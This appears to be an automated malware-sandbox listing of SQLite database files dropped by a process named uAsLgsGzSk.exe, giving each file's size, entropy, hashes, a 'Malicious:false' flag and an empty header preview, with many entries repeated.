SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:false
Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:dropped
Size (bytes):20480
Entropy (8bit):0.5707520969659783
Encrypted:false
SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:9F6D153D934BCC50E8BC57E7014B201A
SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:false
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                Category:dropped
                                                                                                Size (bytes):159744
                                                                                                Entropy (8bit):0.7873599747470391
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):49152
                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):126976
                                                                                                Entropy (8bit):0.47147045728725767
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                Category:dropped
                                                                                                Size (bytes):159744
                                                                                                Entropy (8bit):0.7873599747470391
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
